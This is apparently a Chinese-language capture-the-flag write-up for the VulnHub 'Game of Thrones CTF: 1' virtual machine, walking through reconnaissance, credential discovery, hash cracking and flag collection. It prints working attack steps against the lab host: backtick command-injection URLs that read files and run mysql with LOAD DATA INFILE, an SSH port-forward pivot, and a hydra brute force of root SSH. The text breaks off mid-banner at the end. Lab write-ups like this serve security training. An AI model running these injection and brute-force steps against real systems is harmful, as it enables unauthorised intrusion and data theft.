介绍
名称:Game of Thrones CTF: 1
日期发布:2017年9月8日
作者:OscarAkaElvis
系列:Game of Thrones CTF
地址:https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/
说明
这是一个衡量你的黑客技能的挑战游戏。设置在权力的游戏幻想世界。
目标:
获得7个王国旗帜和4个额外内容旗帜(3个秘密旗帜+最终战斗旗帜)。共有11个。
规则/指南:
开始征服七个王国
你需要黑客技能,不需要权力的游戏知识。但如果你玩,它可能包含电视连续剧的剧透
法典信托基金的难度:中高
别忘了带上你的地图(试着找到它)。它将引导您了解自然旗帜顺序以跟随王国
请仔细聆听提示。如果您遇到困难,请再次阅读提示!
强大的fail2ban法术无处不在。Bruteforce不是这个CTF的选择(2分钟禁止罚款)
标志是32个字符串。Keep’em全部!你需要它们
信息搜集
使用nmap做网络扫描,dirb做目录扫描。
网络信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 7kingdoms.lan (192.168.123.154)
Host is up (0.00026s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
21/tcp open|filtered ftp
22/tcp open|filtered ssh
53/tcp open|filtered domain
80/tcp open|filtered http
143/tcp open|filtered imap
3306/tcp open|filtered mysql
5432/tcp open|filtered postgresql
10000/tcp open|filtered snet-sensor-mgmt
30000/tcp open|filtered ndmps
MAC Address: 08:00:27:79:73:E8 (Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (4 hosts up) scanned in 5.34 seconds
|
- 目标为:
192.168.123.154开放了一系列的端口。
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
|
## root @ Sec in ~
$ dirb http://192.168.123.154/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Nov 5
URL_BASE: http://192.168.123.154/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.154/ ----
==> DIRECTORY: http://192.168.123.154/css/
+ http://192.168.123.154/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://192.168.123.154/h/
==> DIRECTORY: http://192.168.123.154/imgs/
+ http://192.168.123.154/index.php (CODE:200|SIZE:2601)
==> DIRECTORY: http://192.168.123.154/js/
==> DIRECTORY: http://192.168.123.154/music/
+ http://192.168.123.154/robots.txt (CODE:200|SIZE:135)
+ http://192.168.123.154/server-status (CODE:403|SIZE:222)
+ http://192.168.123.154/sitemap.xml (CODE:200|SIZE:214)
---- Entering directory: http://192.168.123.154/css/ ----
+ http://192.168.123.154/css/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.123.154/h/ ----
==> DIRECTORY: http://192.168.123.154/h/i/
---- Entering directory: http://192.168.123.154/imgs/ ----
+ http://192.168.123.154/imgs/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.123.154/js/ ----
+ http://192.168.123.154/js/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.123.154/music/ ----
+ http://192.168.123.154/music/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.123.154/h/i/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/
---- Entering directory: http://192.168.123.154/h/i/d/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/d/
---- Entering directory: http://192.168.123.154/h/i/d/d/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/d/e/
---- Entering directory: http://192.168.123.154/h/i/d/d/e/ ----
==> DIRECTORY: http://192.168.123.154/h/i/d/d/e/n/
---- Entering directory: http://192.168.123.154/h/i/d/d/e/n/ ----
+ http://192.168.123.154/h/i/d/d/e/n/index.php (CODE:200|SIZE:732)
-----------------
END_TIME: Mon Nov
DOWNLOADED: 50732 - FOUND: 10
|
robots.txt
1
2
3
4
5
6
7
8
9
10
11
|
User-agent: Three-eyed-raven
Allow: /the-tree/
User-agent: *
Disallow: /secret-island/
Disallow: /direct-access-to-kings-landing/```
/the-tree/搜集到:
```bash
"You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody
“如果你想从三只眼睛的乌鸦那里得到正确的答案,你就得改变你自己的形状和脸型”——有人写在树上。
|
/secret-island/搜集到:
1
2
3
|
"Take this map and use it wisely. I want to be your friend" - Petyr (Littlefinger) Baelish /* 目录里面有提示
拿着这张地图,明智地使用它。我想成为你的朋友
/imgs/map_to_westeros.jpg /*链接到一张图片。
|
/direct-access-to-kings-landing/搜集到:
1
2
|
"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
“我听说野蛮人经常演奏音乐。它们并不像人们想象的那么疯狂,是吗?”桑莎斯塔克
|
/h/i/d/d/e/n/搜集到:
1
2
3
4
|
"My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys
"Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light has shown me" - The Red Woman Melisandr
“我的小鸟到处都是。要进入Dorne,你必须说:现在,你欠我——“主(蜘蛛)瓦里斯”
“强大的码头法师被铸造在所有王国上。我们必须小心!你不能直接从一个旅行到另一个…通常情况下。这就是光之主向我展示的——“红女人梅丽珊德
|
这里提示有个帐号和密码的样子,我们先放着看看有没有其他提示。
sitemap.xml
1
2
3
4
5
6
7
8
9
10
11
12
|
<urlset>
<url>
<loc>index.php</loc>
<changefreq>never</changefreq>
<priority>1</priority>
</url>
<url>
<loc>raven.php</loc>
<changefreq>never</changefreq>
<priority>0.5</priority>
</url>
</urlset>
|
the-tree 目录里面有一个提示是"You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody,将User-Agent改为Three-eyed-raven,重新提交获得:
1
2
3
4
5
6
7
8
9
|
meme4.jpg
"I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark
“我会给你三个暗示,我可以看到未来,所以仔细听”——三只眼睛乌鸦布兰斯塔克
"To enter in Dorne you must identify as oberynmartell. You still should find the password"
“进入Dorne,你必须认出奥伯林马特尔。你还是应该找到密码
"3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them"
“3487 64535 64535。记住这些数字,你需要和有礼貌的人一起使用,你知道什么时候使用它们。
"The savages never crossed the wall. So you must look for them before crossing it"
“野人从来没有穿过墙。所以你必须在过马路前寻找它们。
|
flag1
一看网页有个音乐的图标,职业敏感告诉我这有问题。
1
2
3
4
5
6
7
8
9
10
|
$ wget http://192.168.123.154/secret-island/meme3.gif
-- http://192.168.123.154/secret-island/meme3.gif
正在连接 127.0.0.1:1089... 已连接。
已发出 Proxy 请求,正在等待回应... 200 OK
长度:2076935 (2.0M) [image/gif]
正在保存至: “meme3.gif.1”
meme3.gif.1 100%[===================>] 1.98M --.-KB/s 用时 0.007s
(270 MB/s) - 已保存 “meme3.gif.1” [2076935/2076935])
|
直接下载打开。
1
2
3
4
5
6
7
8
9
10
11
12
|
$ wget http://192.168.123.154/music/game_of_thrones.mp3
-- http://192.168.123.154/music/game_of_thrones.mp3
正在连接 127.0.0.1:1089... 已连接。
已发出 Proxy 请求,正在等待回应... 200 OK
长度:1685675 (1.6M) [audio/mpeg]
正在保存至: “game_of_thrones.mp3.1”
game_of_thrones.mp3 100%[==================>] 1.61M --.-KB/s 用时 0.01s
(131 MB/s) - 已保存 “game_of_thrones.mp3.1” [1685675/1685675])
$ strings 'game_of_thrones.mp3'
Savages secret flag: 8bf8854be
|
获取到地一个flag8bf8854be。
wav文件获取到一些有用的信息:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
$ wget http://192.168.123.154/music/game_of_thrones.wav
--- http://192.168.123.154/music/game_of_thrones.wav
正在连接 127.0.0.1:1089... 已连接。
已发出 Proxy 请求,正在等待回应... 200 OK
长度:17699406 (17M) [audio/x-wav]
正在保存至: “game_of_thrones.wav.1”
game_of_thrones.wav 100%[=================>] 16.88M --.-KB/s 用时 0.05s
(312 MB/s) - 已保存 “game_of_thrones.wav.1” [17699406/17699406])
## root @ Sec in /tmp [14:28:12]
$ binwalk game_of_thrones.wav
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
1393074 0x1541B2 MySQL ISAM index file Version 8
1599419 0x1867BB MySQL ISAM index file Version 8
5694924 0x56E5CC MySQL ISAM compressed data file Version 8
5838319 0x5915EF MySQL ISAM compressed data file Version 11
9130555 0x8B523B MySQL MISAM compressed data file Version 3
10892382 0xA6345E MySQL MISAM compressed data file Version 4
12931384 0xC55138 MySQL MISAM compressed data file Version 1
13650693 0xD04B05 MySQL ISAM compressed data file Version 10
16143118 0xF6530E MySQL ISAM compressed data file Version 7
16422041 0xFA9499 MySQL ISAM index file Version 5
16753196 0xFFA22C MySQL ISAM index file Version 2
|
flag2
- 通过上面的提示,我找到一个帐号密码最终尝试ftp成功连接。
- 连上后发现两个文件,下载下来看看。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
Name (192.168.123.154:root): oberynmartell
331 User oberynmartell OK. Password required
Password:
230-OK. Current directory is /
230-Welcome to:
230- ____
230-| \ ___ ___ ___ ___
230-| | | . | _| | -_|
230-|____/|___|_| |_|_|___|
230-
230-Principality of Dorne was conquered. This is your first kingdom flag!
230 fb8d98be1265dd88bac522e1b2182140
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Connecting to port 45681
-rw-r--r-- 1 0 0 304 Aug 27 2017 problems_in_the_north.txt
-rw-r--r-- 1 0 0 492 Aug 20 2017 the_wall.txt.nc
226-Options: -l
226 2 matches total
ftp> get problems_in_the_north.txt
local: problems_in_the_north.txt remote: problems_in_the_north.txt
200 PORT command successful
150 Connecting to port 34121
226-File successfully transferred
226 0.003 seconds (measured here), 91.35 Kbytes per second
304 bytes received in 0.00 secs (103.8751 kB/s)
ftp> get the_wall.txt.nc
local: the_wall.txt.nc remote: the_wall.txt.nc
200 PORT command successful
150 Connecting to port 58519
226-File successfully transferred
226 0.004 seconds (measured here), 125.15 Kbytes per second
492 bytes received in 0.00 secs (121.1775 kB/s)
|
- 连接上后发现第二个flag:
fb8d98be1265dd88bac522e1b2182140,里面还有两个文件,下载下来看看。
problems_in_the_north.txt
1
2
3
4
5
6
7
|
"There are problems in the north. We must travel quickly. Once there we must defend the wall" - Jon Snow
“北方有问题。我们必须快速旅行。一旦在那里我们必须保卫墙“-琼恩·雪诺
"What kind of magic is this?!? I never saw before this kind of papirus. Let's check it carefully" - Maester Aemon Targaryen
“这是什么魔力?”???我从未见过这种乳头。让我们仔细检查一下-”Maester Aemon Targaryen
md5(md5($s).$p)
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a
|
- 搜索了下这是一个老版本的hash,需要下载一个专用的程序破解同时将hash改为
6000e084bf18c302eae4559d48cb520c:2hY68a。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
$ ./hashcat-cli64.bin -m 3610 -a 0 /tmp/icekam.txt /usr/share/wordlists/rockyou.txt
Initializing hashcat v2.00 with 4 threads and 32mb segment-size...
Added hashes from file /tmp/icekam.txt: 1 (1 salts)
Activating quick-digest mode for single-hash with salt
6000e084bf18c302eae4559d48cb520c:2hY68a:stark
All hashes have been recovered
Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 3.64M words
Progress..: 3053309/3627099 (84.18%)
Running...: 00:00:00:01
Estimated.: --:--:--:--
Started: Mon Nov 5
Stopped: Mon Nov 5
|
flag3
the_wall.txt.nc文件
1
2
3
4
5
|
$ binwalk the_wall.txt.nc
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 mcrypt 2.5 encrypted data, algorithm: "rijndael-128", keysize: 32 bytes, mode: "c",
|
1
2
3
|
$ mcrypt -d the_wall.txt.nc
Enter passphrase:
File the_wall.txt.nc was decrypted.
|
解密内容:
1
2
3
4
5
6
7
8
|
"We defended the wall. Thanks for your help. Now you can go to recover Winterfell" - Jeor Mormont, Lord Commander of the Night's Watch
“我们为墙辩护。谢谢你的帮助。现在你可以去寻找冬城了-杰尔莫尔蒙,夜守望司令
"I'll write on your map this route to get faster to Winterfell. Someday I'll be a great maester" - Samwell Tarly
“我会在你的地图上写下这条路线,以更快地到达临冬城。“有一天我会成为一个伟大的大师”——约翰·C·布莱德利
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
Enter using this user/pass combination:
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!
|
- 这里有一个域名,我们需要把目标ip指向这个域名,直接修改本地hosts。
192.168.123.154 winterfell.7kingdoms.ctf
然后打开:http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------输入帐号密码即可。
得到flag:
1
2
3
4
5
6
7
8
|
Welcome to Winterfell
You conquered the Kingdom of the North. This is your second kingdom flag!
639bae9ac6b3e1a84cebb7b403297b79
"We must do something here before travelling to Iron Islands, my lady" - Podrick Payne
“在我们去铁群岛之前,我们必须做点什么,我的夫人”——Podrick Payne
"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
“是的,我能感觉到那个盾牌的魔力。刀剑在这里不再有用了——“- Brienne Tarth
|
flag4
我在登录后发现一个stark_shield.jpg的图片里面含有提示信息,下载下来读取了下内容。
1
2
|
"Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy
“Timff0Run3RS文本应被要求进入铁岛要塞”- Theon Greyjoy
|
好像提示我们使用txt之类的,我能想起的就是txt域名记录了,我们尝试一下。
1
2
3
4
5
6
7
8
9
10
11
|
$ nslookup -q=TXT Timef0rconqu3rs 192.168.123.154
Server: 192.168.123.154
Address: 192.168.123.154#53
** server can't find Timef0rconqu3rs: NXDOMAIN /*失败
$ nslookup -q=TXT Timef0rconqu3rs.7kingdoms.ctf 192.168.123.154
Server: 192.168.123.154
Address: 192.168.123.154#53
Timef0rconqu3rs.7kingdoms.ctf text = "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"
|
- 又获取到一个帐号密码:
aryastark/N3ddl3_1s_a_g00d_sword#!,提示我们访问10000端口。
我们还是添加一个stormlands.7kingdoms.ctf的hosts,然后访问。
登录成功后发现http://stormlands.7kingdoms.ctf:10000/是一个文件管理系统,里面可以查询系统负载信息之类的。
可以通过搜索'符号获取文件管理器,浏览器需要支持java,我使用虚拟机访问。
在/ home / aryastark发现flag:8fc42c6ddf9966db3b09e84365034357
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
Welcome to:
_____ _ _ _
| __| |_ ___ ___ _____| |___ ___ _| |___
|__ | _| . | _| | | . | | . |_ -|
|_____|_| |___|_| |_|_|_|_|__,|_|_|___|___|
Congratulations! you conquered Stormlands. This is your flag: 8fc42c6ddf9966db3b09e84365034357
Now prepare yourself for the next challenge!
The credentials to access to the Mountain and the Vale kingdom are:
user/pass: robinarryn/cr0wn_f0r_a_King-_
db: mountainandthevale
pgAdmin magic will not work. Command line should be used on that kingdom – Talisa Maegyr
Flag.txt contains the next flag and some useful hints how to proceed.
|
flag5
还泄露了一个帐号密码,根据地图发现这个是一个postgresql数据库连接配置,我们使用上面给出的帐号密码登录。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
$ psql -h 192.168.123.154 -p 5432 -U robinarryn -d mountainandthevale
用户 robinarryn 的口令:
psql (11.0 (Debian 11.0-1+b1), 服务器 9.6.4)
输入 "help" 来获取帮助信息.
mountainandthevale=> \d
关联列表
架构模式 | 名称 | 类型 | 拥有者
----------+----------------------------+--------+------------
public | aryas_kill_list | 数据表 | postgres
public | aryas_kill_list_id_seq | 序列数 | postgres
public | braavos_book | 数据表 | postgres
public | eyrie | 数据表 | postgres
public | eyrie_id_seq | 序列数 | postgres
public | flag | 视图 | robinarryn
public | popular_wisdom_book | 数据表 | postgres
public | popular_wisdom_book_id_seq | 序列数 | postgres
(8 行记录)
mountainandthevale=> \d+ flag
视图 "public.flag"
栏位 | 类型 | Collation | Nullable | Default | 存储 | 描述
----------+---------+-----------+----------+---------+-------+------
?column? | unknown | | | | plain |
视图定义:
SELECT 'TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw==';
mountainandthevale=>
|
1
2
|
Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: [email protected]/H1gh.Gard3n.powah , but first you must be able to open the gates
好极了!你征服了山脉和山谷的王国。这是你的旗帜:BB3AEC0FDCDC97890F805C585 D432。下一站,到达Kingdom。您可以使用这个用户/传递组合来标识自己:[email protected]/H1gh.Gard3n.powah,但是首先必须能够打开门
|
- 获得flag:
bb3aec0fdcdbc2974890f805c585d432,同时有一个提示和帐号密码。
在sql查询aryas_kill_list表获得一些信息:
1
2
3
|
mountainandthevale=> SELECT* FROM braavos_book;
Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
|
1
2
|
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
多面的神要你改变你的面貌。他想让你认出你的杀人名单。根据这本书丢失的页码选择它。连接的数据库将是BRAVOS,您的密码将是:ValaMrgululi
|
flag6
- 回顾以前的提示143有一个可访问的权限,可是我通过nmap扫描提示无访问,3487,64535,12345也不行,借助万能的搜索,发现一个脚本可以利用。
1
2
3
4
5
6
7
8
9
|
root@Sec:/tmp## git clone https://github.com/grongor/knock.git
正克隆到 'knock'...
remote: Enumerating objects: 20, done.
remote: Total 20 (delta 0), reused 0 (delta 0), pack-reused 20
展开对象中: 100% (20/20), 完成.
root@Sec:/tmp## cd knock/
root@Sec:/tmp/knock## ls
knock readme.md
root@Sec:/tmp/knock## ./knock 192.168.123.154 3487 64535 12345
|
1
2
3
4
5
6
7
8
9
10
|
root@Sec:/tmp/knock## nmap -p143 192.168.123.154
Starting Nmap 7.70 ( https://nmap.org ) at
Nmap scan report for winterfell.7kingdoms.ctf (192.168.123.154)
Host is up (0.00038s latency).
PORT STATE SERVICE
143/tcp open imap
MAC Address: 08:00:27:79:73:E8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
root@Sec:/tmp/knock## telnet 192.168.123.154 143
Trying 192.168.123.154...
Connected to 192.168.123.154.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=LOGIN AUTH=PLAIN] Kingdom of the Reach
a login [email protected] H1gh.Gard3n.powah
a OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
a list "" "*"
* LIST (\HasNoChildren \Trash) "/" Trash
* LIST (\HasNoChildren \Drafts) "/" Drafts
* LIST (\HasNoChildren \Sent) "/" Sent
* LIST (\HasNoChildren) "/" INBOX
a OK List completed (0.000 secs).
a SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] First unseen.
* OK [UIDVALIDITY 1504823858] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* OK [HIGHESTMODSEQ 1] Highest
a OK [READ-WRITE] Select completed (0.005 secs).
a FETCH 1 ALL
* 1 FETCH (FLAGS (\Recent) INTERNALDATE "08-Sep-2017 00:37:38 +0200" RFC822.SIZE 797 ENVELOPE ("Fri, 8 Sep 2017 00:37:37 +0200 (CEST)" "You conquered the Kingdom of the Reach" (("Sir_Loras_Tyrell" NIL "lorastyrell" "7kingdoms.ctf")) (("Sir_Loras_Tyrell" NIL "lorastyrell" "7kingdoms.ctf")) (("Sir_Loras_Tyrell" NIL "lorastyrell" "7kingdoms.ctf")) ((NIL NIL "olennatyrell" "7kingdoms.ctf")) NIL NIL NIL "<[email protected]>"))
a OK Fetch completed (0.004 secs).
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
$ curl --insecure \
--url "imap://192.168.123.154/Inbox;UID=1" \
--user "[email protected]:H1gh.Gard3n.powah"
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: by mail.7kingdoms.ctf (Postfix, from userid 0)
id E1FA643329; Fri, 8 Sep 2017 00:37:37 +0200 (CEST)
Subject: You conquered the Kingdom of the Reach
From: Sir_Loras_Tyrell<[email protected]>
To: <[email protected]>
X-Mailer: mail (GNU Mailutils 2.99.98)
Message-Id: <[email protected]>
Date: Fri, 8 Sep 2017 00:37:37 +0200 (CEST)
Congratulations!!
You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db
Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:
User: TywinLannister
Pass: LannisterN3verDie!
"The things I do for love..." - Jaime (Kingslayer) Lannister
|
- 获取到flag:
aee750c2009723355e2ac57564f9c3db,还有一个帐号密码和端口。
flag7
打开http://192.168.123.154:1337,使用上面的帐号密码登录在/casterly-rock/blob/master/note_under_the_bed.md发现一串字符,2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
$ echo 2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874 | xxd -r -p
/home/tyrionlannister/checkpoint.txt## ```
明显是一个列目录的消息,搜索了下有类似的漏洞。
我直接读取上面的内容:
`http://192.168.123.154:1337/casterly-rock/blob/master/%E2%80%9D%E2%80%9D%20%60cat%20/home/tyrionlannister/checkpoint.txt%20%60`
返回
```bash
_____ _ _____ _
|_ _| |_ ___ | __ |___ ___| |_
| | | | -_| | -| . | _| '_|
|_| |_|_|___| |__|__|___|___|_,_|
You are very close to get the flag. Is not here, it's at King's Landing. We must travel there from here!
The credentials to access to King's Landing are:
user/pass: cerseilannister/_g0dsHaveNoMercy_
db: kingslanding
"Chaos isn't a pit. Chaos is a ladder" - Petyr (Littlefinger) Baelish
': File name too long
|
访问:
1
|
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="SELECT * from iron_throne;" `
|
- 获得一个摩斯电码:
-..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --.
翻译后:/ETC/MYSQL/FLAG
直接无法读取,我们将flag表导入到其他表然后读取。
1
2
3
|
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="CREATE TABLE test (flag TEXT);" `
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="LOAD data INFILE '/etc/mysql/flag' INTO TABLE test;" `
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="select * from test;" `
|
1
2
3
4
5
6
|
Congratulations. You conquered the last kingdom flag.
This is your flag: c8d46d341bea4fd5bff866a65ff8aea9
Now you must find the Dragonglass mine to forge stronger weapons.
Ssh user-pass:
daenerystargaryen-.Dracarys4thewin.
"All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons': File name too long
|
flag8
使用上面的信息登录ssh
帐号:daenerystargaryen
密码:.Dracarys4thewin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
[email protected]'s password:
__ _ _ ___
| | ___ ___| |_|_|___ ___ | _|___ ___
| |__| . | . | '_| | | . | | _| . | _|
|_____|___|___|_,_|_|_|_|_ | |_| |___|_|
|___|
____ _
| \ ___ ___ ___ ___ ___ ___| |___ ___ ___
| | | _| .'| . | . | | . | | .'|_ -|_ -|
|____/|_| |__,|_ |___|_|_|_ |_|__,|___|___|
|___| |___|
daenerystargaryen@7kingdoms:~$ pwd
/home/daenerystargaryen
daenerystargaryen@7kingdoms:~$ ls
checkpoint.txt digger.txt
daenerystargaryen@7kingdoms:~$ cat digger.txt
mackenzie
babyboo
root
mystuff
singapore
trevor
.....
rachelle
123456789123456
daenerystargaryen@7kingdoms:~$ uaname
-bash: uaname: command not found
daenerystargaryen@7kingdoms:~$ uname
Linux
daenerystargaryen@7kingdoms:~$ cat checkpoint.txt
"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre
“dragonglass。冷冻四,在舌部老亚。Small Wonder它anathema冰冷的孩子和其他的“红卓的女人
"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly
在Dragonglass矿(172.25.0.2)上可以发现大量的Dragonglass。只有从这里才能进入矿井。我们非常亲密…Fail2ban魔术不存在,也许我们可以从外部找到问题的“根源”来使用这个挖掘机“-SamwellTally
"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow
“白行者不在乎一个人是自由的人还是乌鸦。我们对他们都一样,为他们的军队吃肉。“但是我们可以打败他们”——琼恩·雪诺
|
发现限制得很严格,无法提权,但有提示Fail2ban不存在,显示有一个本地可访问的ip,有一堆的密码口令。
那么我们就存在什么呢,第一个是ssh端口反弹,第二个是密码爆破。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
$ ssh -f [email protected] 17891:172.25.0.2:22 -N
ssh: Could not resolve hostname 192.168.123.154-l: Name or service not known
## root @ Sec in /tmp [19:30:06] C:255
$ ssh -f [email protected] -L 17891:172.25.0.2:22 -N
[email protected]'s password:
## root @ Sec in /tmp [19:30:20]
$ hydra -l root -P digger.txt ssh://localhost:17891
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1001 login tries (l:1/p:1001), ~63 tries per task
[DATA] attacking ssh://localhost:17891/
[17891][ssh] host: localhost login: root password: Dr4g0nGl4ss!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at
|
爆破成功,密码Dr4g0nGl4ss!,登录后获取flag。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
$ ssh root@localhost -p 17891
The authenticity of host '[localhost]:17891 ([::1]:17891)' can't be established.
ECDSA key fingerprint is SHA256:CLkjibFJaJn7gL10+IfE7LWYVS34ZgavwWKn+ej4LaU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:17891' (ECDSA) to the list of known hosts.
root@localhost's password:
You found the
____ _
| \ ___ ___ ___ ___ ___ ___| |___ ___ ___
| | | _| .'| . | . | | . | | .'|_ -|_ -|
